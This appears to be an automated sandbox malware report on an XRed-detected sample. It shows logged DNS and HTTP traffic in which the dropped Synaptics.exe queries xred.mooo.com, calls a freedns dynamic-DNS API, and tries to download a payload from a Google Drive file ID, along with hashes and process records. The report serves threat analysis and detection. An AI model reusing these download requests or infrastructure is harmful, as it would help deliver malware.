Jan 2, 2025 20:41:41.334709883 CET	1.1.1.1	192.168.2.6	0x65ab	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 2, 2025 20:41:41.334709883 CET	1.1.1.1	192.168.2.6	0x65ab	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false
Jan 2, 2025 20:41:48.000421047 CET	1.1.1.1	192.168.2.6	0xa9a1	Name error (3)	xred.mooo.com	none	none	A (IP address)	IN (0x0001)	false
Jan 2, 2025 20:41:48.151300907 CET	1.1.1.1	192.168.2.6	0x6d24	No error (0)	freedns.afraid.org		69.42.215.252	A (IP address)	IN (0x0001)	false
Jan 2, 2025 20:42:46.915191889 CET	1.1.1.1	192.168.2.6	0x48d2	No error (0)	docs.google.com		142.250.186.78	A (IP address)	IN (0x0001)	false
Jan 2, 2025 20:42:48.009958029 CET	1.1.1.1	192.168.2.6	0x8736	No error (0)	drive.usercontent.google.com		142.250.186.97	A (IP address)	IN (0x0001)	false
Jan 2, 2025 20:42:49.311538935 CET	1.1.1.1	192.168.2.6	0x4461	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 2, 2025 20:42:49.311538935 CET	1.1.1.1	192.168.2.6	0x4461	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

docs.google.com

drive.usercontent.google.com

freedns.afraid.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49755	69.42.215.252	80	6464	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 20:41:48.162491083 CET	154	OUT	GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1 User-Agent: MyApp Host: freedns.afraid.org Cache-Control: no-cache
Jan 2, 2025 20:41:48.776535988 CET	243	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 02 Jan 2025 19:41:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding X-Cache: MISS Data Raw: 31 66 0d 0a 45 52 52 4f 52 3a 20 43 6f 75 6c 64 20 6e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 2e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 1fERROR: Could not authenticate.0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49998	142.250.186.78	443	6464	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 19:42:47 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2025-01-02 19:42:47 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Thu, 02 Jan 2025 19:42:47 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-D9q66BWD9RE8vJjc8NhP2g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49999	142.250.186.97	443	6464	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 19:42:48 UTC	186	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2025-01-02 19:42:49 UTC	1594	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC7YhJgTiXXbMA8FMjXFegLjJAKlFg3PYhgnIZXtegTJzztXLTjhiybMLhm4S0Maousi Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Thu, 02 Jan 2025 19:42:48 GMT P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: script-src 'report-sample' 'nonce-rw0VJBBeYHcFRZdPej5R6w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Length: 1652 Server: UploadServer Set-Cookie: NID=520=jSQVOxxIP5xjIHNcdh0OjjqByDxmO1yLRWK-PA2Dkmw4BSOGzUov0QhxV9h_10-O4EnomrDII663AgVvqsFtNp6NXVS8l4XLU-0Lueq0A3UwyrIaSjIgP5ssLlv1ovtKtV9_yAj-Xzz4VyXA2x4efgakXVPvI-vMP32rD00BBrYS3_CCzv7GyiQ; expires=Fri, 04-Jul-2025 19:42:48 GMT; path=/; domain=.google.com; HttpOnly Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-02 19:42:49 UTC	1594	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 75 43 65 37 39 48 4d 53 4a 4c 61 52 5a 65 64 52 44 77 49 33 68 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="uCe79HMSJLaRZedRDwI3hQ">*{margin:0;padding:0}html,code{font:15px/22px arial
2025-01-02 19:42:49 UTC	58	IN	Data Raw: 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: nd on this server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	50000	142.250.186.78	443	6464	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 19:42:49 UTC	344	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache Cookie: NID=520=jSQVOxxIP5xjIHNcdh0OjjqByDxmO1yLRWK-PA2Dkmw4BSOGzUov0QhxV9h_10-O4EnomrDII663AgVvqsFtNp6NXVS8l4XLU-0Lueq0A3UwyrIaSjIgP5ssLlv1ovtKtV9_yAj-Xzz4VyXA2x4efgakXVPvI-vMP32rD00BBrYS3_CCzv7GyiQ
2025-01-02 19:42:50 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Thu, 02 Jan 2025 19:42:50 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: script-src 'report-sample' 'nonce-zjDVvsT0lMJIyL2-4NaxXg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	50003	142.250.186.97	443	6464	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 19:42:50 UTC	387	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=jSQVOxxIP5xjIHNcdh0OjjqByDxmO1yLRWK-PA2Dkmw4BSOGzUov0QhxV9h_10-O4EnomrDII663AgVvqsFtNp6NXVS8l4XLU-0Lueq0A3UwyrIaSjIgP5ssLlv1ovtKtV9_yAj-Xzz4VyXA2x4efgakXVPvI-vMP32rD00BBrYS3_CCzv7GyiQ
2025-01-02 19:42:51 UTC	1250	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC77MplH4aBRgr_IDfWpREnOsrK1XJsXmZet_X5bB0aSbJhl913xILINhIz8f2oIeUCJiBKBjgQ Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Thu, 02 Jan 2025 19:42:51 GMT Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-dXYYmS1M07mUAkeew5mtrw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-02 19:42:51 UTC	140	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2025-01-02 19:42:51 UTC	1390	IN	Data Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 7a 51 4e 48 54 78 62 64 44 77 74 53 59 36 69 58 71 35 50 63 75 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b Data Ascii: 404 (Not Found)!!1</title><style nonce="zQNHTxbdDwtSY6iXq5Pcuw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2025-01-02 19:42:51 UTC	122	IN	Data Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	50004	142.250.186.78	443	6464	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 19:42:52 UTC	344	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache Cookie: NID=520=jSQVOxxIP5xjIHNcdh0OjjqByDxmO1yLRWK-PA2Dkmw4BSOGzUov0QhxV9h_10-O4EnomrDII663AgVvqsFtNp6NXVS8l4XLU-0Lueq0A3UwyrIaSjIgP5ssLlv1ovtKtV9_yAj-Xzz4VyXA2x4efgakXVPvI-vMP32rD00BBrYS3_CCzv7GyiQ
2025-01-02 19:42:52 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Thu, 02 Jan 2025 19:42:52 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'report-sample' 'nonce-vaf8znbUUocseYrUyEWxLQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	50005	142.250.186.97	443	6464	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 19:42:53 UTC	387	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=jSQVOxxIP5xjIHNcdh0OjjqByDxmO1yLRWK-PA2Dkmw4BSOGzUov0QhxV9h_10-O4EnomrDII663AgVvqsFtNp6NXVS8l4XLU-0Lueq0A3UwyrIaSjIgP5ssLlv1ovtKtV9_yAj-Xzz4VyXA2x4efgakXVPvI-vMP32rD00BBrYS3_CCzv7GyiQ
2025-01-02 19:42:53 UTC	1243	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC6HAwgtSv0Ups-kJhs1AZioBtjsqqehsFUDnFiYMyIqyL4ay_iU7h5piz5H6u_beUvb Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Thu, 02 Jan 2025 19:42:53 GMT Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'report-sample' 'nonce-T__uklnHHoMHhB9QleTc-Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-02 19:42:53 UTC	147	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2025-01-02 19:42:53 UTC	1390	IN	Data Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 45 75 47 73 75 76 4d 59 73 63 56 69 6a 6e 33 66 75 42 52 39 51 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 Data Ascii: t Found)!!1</title><style nonce="EuGsuvMYscVijn3fuBR9Qg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2025-01-02 19:42:53 UTC	115	IN	Data Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>

Target ID:	0
Start time:	14:41:35
Start date:	02/01/2025
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x400000
File size:	15'183'872 bytes
MD5 hash:	7274B0B15C4E6D5BBE8DB5AA93C65A12
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000000.00000000.2134817121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000000.2134817121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	14:41:36
Start date:	02/01/2025
Path:	C:\Users\user\Desktop\._cache_file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\._cache_file.exe"
Imagebase:	0x7c0000
File size:	14'412'304 bytes
MD5 hash:	DE34B1C517E0463602624BBC8294C08D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	14:41:36
Start date:	02/01/2025
Path:	C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe" -burn.clean.room="C:\Users\user\Desktop\._cache_file.exe" -burn.filehandle.attached=644 -burn.filehandle.self=652
Imagebase:	0xe40000
File size:	647'912 bytes
MD5 hash:	2F9D2B6CE54F9095695B53D1AA217C7B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	14:41:38
Start date:	02/01/2025
Path:	C:\ProgramData\Synaptics\Synaptics.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
Imagebase:	0x400000
File size:	771'584 bytes
MD5 hash:	B753207B14C635F29B2ABF64F603570A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000004.00000003.2242519374.00000000006C0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 87%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	14:41:40
Start date:	02/01/2025
Path:	C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Imagebase:	0xbc0000
File size:	53'161'064 bytes
MD5 hash:	4A871771235598812032C822E6F68F19
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	14:41:43
Start date:	02/01/2025
Path:	C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe" -q -burn.elevated BurnPipe.{C5083B7D-B45A-4E12-82C2-69D6A2D5E9AA} {2D07A715-CF60-42B0-9715-B6AF208420A8} 5272
Imagebase:	0xc10000
File size:	647'912 bytes
MD5 hash:	2F9D2B6CE54F9095695B53D1AA217C7B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	14:41:52
Start date:	02/01/2025
Path:	C:\ProgramData\Synaptics\Synaptics.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\Synaptics\Synaptics.exe"
Imagebase:	0x400000
File size:	771'584 bytes
MD5 hash:	B753207B14C635F29B2ABF64F603570A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	14:42:00
Start date:	02/01/2025
Path:	C:\Windows\System32\SrTasks.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:1
Imagebase:	0x7ff67dc50000
File size:	59'392 bytes
MD5 hash:	2694D2D28C368B921686FE567BD319EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	15
Start time:	14:42:00
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
